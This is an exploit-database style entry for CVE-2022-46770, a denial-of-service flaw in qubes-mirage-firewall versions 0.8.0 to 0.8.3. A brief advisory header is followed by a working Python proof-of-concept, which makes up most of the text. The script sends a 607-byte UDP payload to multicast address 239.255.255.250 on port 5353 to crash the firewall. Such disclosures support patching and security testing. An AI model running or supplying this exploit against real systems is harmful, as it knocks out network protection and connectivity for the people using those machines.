Authored by Krzysztof Burghardt

Qubes Mirage Firewall versions 0.8.0 through 0.8.3 suffer from a denial of service vulnerability.

advisories | CVE-2022-46770

# Exploit Title: qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <[email protected]>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"

PORT = 5353

PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)

s.sendto(PAYLOAD, (TARGET, PORT))